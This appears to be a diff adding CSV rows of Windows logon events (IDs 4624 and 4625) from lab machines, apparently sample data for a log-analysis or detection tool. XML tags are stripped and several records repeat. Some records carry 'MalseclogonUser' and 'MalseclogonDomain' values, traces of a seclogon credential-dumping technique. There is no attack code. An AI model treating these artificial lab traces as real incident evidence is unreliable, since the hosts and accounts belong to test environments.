+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768619
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31fb1a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50437
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768618
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31daf6
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50436
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137225
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd964
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd8f6
+ %%1843
+
+"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137224
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd8f6
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd964
+ %%1842
+
+"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137223
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x25c
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4625
+ 0
+ 0
+ 12544
+ 0
+ 0x8010000000000000
+
+
+ 137222
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0xc000006d
+ %%2313
+ 0xc000006a
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+
+"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988550
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x568d99
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64229
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988547
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56874b
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64227
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988544
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x5686d9
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64226
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988535
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567758
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988529
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567515
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.25
+ 50251
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988525
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56738f
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64223
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988522
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-84104
+ 02694W-WIN10$
+ THREEBEESCO.COM
+ 0x567343
+ 3
+ Kerberos
+ Kerberos
+ -
+ 429CA5A3-EDFC-5657-17C3-C050C7B047F4
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.25
+ 50250
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772611
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x1137987
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 50107
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772609
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-5-18
+ 01566S-WIN16-IR$
+ 3B
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x244
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772607
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x1136e95
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 50106
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 329918
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ MalseclogonUser
+ MalseclogonDomain
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 329918
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ MalseclogonUser
+ MalseclogonDomain
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65971
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ ICORP-DC$
+ INTERNAL.CORP
+ 0x24db24
+ 3
+ Kerberos
+ Kerberos
+ -
+ 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50152
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65969
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-2895268558-4179327395-2773671012-1108
+ EXCHANGE$
+ ICORP
+ 0x24daa6
+ 3
+ NtLmSsp
+ NTLM
+ EXCHANGE
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 0
+ 0x0
+ -
+ 192.168.111.87
+ 58128
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65967
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ ICORP-DC$
+ INTERNAL.CORP
+ 0x24c879
+ 3
+ Kerberos
+ Kerberos
+ -
+ 94BA67EA-8490-3C86-6DB7-DF74C9AA4449
+ -
+ -
+ 0
+ 0x0
+ -
+ 127.0.0.1
+ 50151
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65971
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ ICORP-DC$
+ INTERNAL.CORP
+ 0x24db24
+ 3
+ Kerberos
+ Kerberos
+ -
+ 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50152
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65969
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-2895268558-4179327395-2773671012-1108
+ EXCHANGE$
+ ICORP
+ 0x24daa6
+ 3
+ NtLmSsp
+ NTLM
+ EXCHANGE
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 0
+ 0x0
+ -
+ 192.168.111.87
+ 58128
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65967
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ ICORP-DC$
+ INTERNAL.CORP
+ 0x24c879
+ 3
+ Kerberos
+ Kerberos
+ -
+ 94BA67EA-8490-3C86-6DB7-DF74C9AA4449
+ -
+ -
+ 0
+ 0x0
+ -
+ 127.0.0.1
+ 50151
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 10113
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x2e4ce
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x38f87e
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1b90
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ l
+ o
+ %%1843
+ 0x0
+ %%1843
+
+"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 329918
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ MalseclogonUser
+ MalseclogonDomain
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21373
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x82215a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21371
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x821f28
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21369
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x821aab
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21367
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x820d61
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63640
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65971
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ ICORP-DC$
+ INTERNAL.CORP
+ 0x24db24
+ 3
+ Kerberos
+ Kerberos
+ -
+ 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50152
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65969
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-2895268558-4179327395-2773671012-1108
+ EXCHANGE$
+ ICORP
+ 0x24daa6
+ 3
+ NtLmSsp
+ NTLM
+ EXCHANGE
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 0
+ 0x0
+ -
+ 192.168.111.87
+ 58128
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 65967
+
+
+
+
+ Security
+ ICORP-DC.internal.corp
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ ICORP-DC$
+ INTERNAL.CORP
+ 0x24c879
+ 3
+ Kerberos
+ Kerberos
+ -
+ 94BA67EA-8490-3C86-6DB7-DF74C9AA4449
+ -
+ -
+ 0
+ 0x0
+ -
+ 127.0.0.1
+ 50151
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 10113
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x2e4ce
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x38f87e
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1b90
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ l
+ o
+ %%1843
+ 0x0
+ %%1843
+
+"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 329918
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ MalseclogonUser
+ MalseclogonDomain
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21373
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x82215a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 21371
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-81107902-1099128984-1836738286-500
+ Administrator
+ WINLAB.LOCAL
+ 0x821f28
+ 3
+ Kerberos
+ Kerberos
+ -
+ 59CEFB69-4F9D-7486-C449-471E00B814E3
+ -
+ -
+ 0
+ 0x0
+ -
+ 192.168.1.219
+ 63652
+ %%1833
+ -
